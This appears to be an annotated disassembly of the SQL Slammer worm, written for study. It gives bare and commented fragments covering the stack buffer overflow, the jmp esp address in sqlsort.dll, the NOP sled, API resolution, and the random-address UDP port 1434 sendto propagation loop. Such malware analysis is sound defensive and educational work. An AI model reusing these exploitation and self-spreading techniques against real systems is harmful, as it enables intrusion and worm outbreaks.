SQL Slammer


add al, 1
add [ecx], eax
add [ecx], eax
....
add esp, ebx
leave
mov al, 42h ; 'B'
jmp short loc_75
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [eax-52h], esi
inc edx

add al, 1
add [ecx], eax ; 02 - 5E is used to fill up memory so we can cause the buffer overflow (filler to generate buffer overflow)
add [ecx], eax
...
add esp, ebx
leave ; stack is restored
mov al, 42h ; 'B' ; goes to sqlsort so we can use the jmp esp
jmp short loc_75 ; jumps to jmp esp
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [eax-52h], esi
inc edx
add [eax-52h], esi
inc edx

call dword ptr [esi]
call eax
xor ecx, ecx
push ecx
push ecx
push eax

call dword ptr [esi] ; GetProcAddress with parameters - handle, GetTickCount
call eax ; GetTickCount is called
xor ecx, ecx ; value of ecx is set to 0
push ecx ; 4 bytes of space for local variable
push ecx ; 4 bytes of space for local variable
push eax ; return value of GetTickCount is pushed onto the stack - the number of milliseconds since the system was last started
         ; used as parameter for random number generation later

loc_75:
nop
nop
nop
nop
nop
push 42B0C9DCh
mov eax, 1010101h
xor ecx, ecx
mov cl, 18h
loc_8B:
push eax
loop loc_8B
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh

loc_75:
nop ; nop sled indicates beginning of worm code
nop
nop
nop
nop
push 42B0C9DCh ; this is the address of the jmp esp used in sqlsort.dll
mov eax, 1010101h ; 1010101h is in the register eax
xor ecx, ecx ; value of ecx is set to 0 by xor
mov cl, 18h ; counter = 18h = 24 in decimal
loc_8B: ; CODE XREF: seg000:0000008C↓j
push eax ; eax pushed on stack each loop iteration
loop loc_8B ; looped 18h (24) times, ecx decremented by 1 each time
xor eax, 5010101h ; 0x1010101 xor 0x5010101 = 0x04000000
                  ; 0x04 is the request for the payload, lets us know payload is coming after this
push eax ; push eax onto the stack
mov ebp, esp ; stack base pointer is initialized
push ecx ; pushed on stack
push 6C6C642Eh ; in ASCII, this translates to ".dll"
push 32336C65h ; in ASCII, this translates to "el32"
push 6E72656Bh ; in ASCII, this translates to "kern" (basically kernel32.dll)
               ; kernel32.dll string is pushed onto the stack

seg000:0000015D mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi
jmp short loc_142

mov [ebp-4Ch], eax ; store generated random number as IP address
push 10h ; 16 bytes length
lea eax, [ebp-50h] ; load the address of the socket address structure
push eax ; push it onto the stack for later use
xor ecx, ecx ; ecx = 0
push ecx ; push it onto the stack for later use
xor cx, 178h ; the length of the payload being sent is 178h = 376 bytes
push ecx ; push it onto the stack for later use
lea eax, [ebp+3] ; load the address of the payload
push eax ; push it onto the stack for later use
mov eax, [ebp-54h] ; load the socket descriptor
push eax ; push it onto the stack for later use
call esi ; call sendto with all the parameters on the stack
jmp short loc_142 ; send to other random addresses

xor ecx, 9B040103h
xor ecx, 1010101h
push ecx
lea eax, [ebp-34h]
push eax
mov eax, [ebp-40h]
push eax
call dword ptr [esi]
push 11h
push 2
push 2
call eax

xor ecx, 9B040103h ; xor to get the UDP port
xor ecx, 1010101h ; 0x9B040103 xor 0x1010101 = 0x9A050002
push ecx ; 0x9A050002 = AF_INET, port 1434 (the UDP port the packet is sent to)
lea eax, [ebp-34h] ; loads address of string "socket" into eax as parameter for GetProcAddress
push eax ; parameter is pushed onto the stack for GetProcAddress
mov eax, [ebp-40h] ; loads address of string "ws2_32.dll" into eax as parameter for GetProcAddress
push eax ; parameter is pushed onto the stack for GetProcAddress
call dword ptr [esi] ; GetProcAddress is called with socket and ws2_32.dll as parameters
push 11h ; IPPROTO_UDP
push 2 ; datagram socket
push 2 ; AF_INET
call eax ; socket called with the above parameters
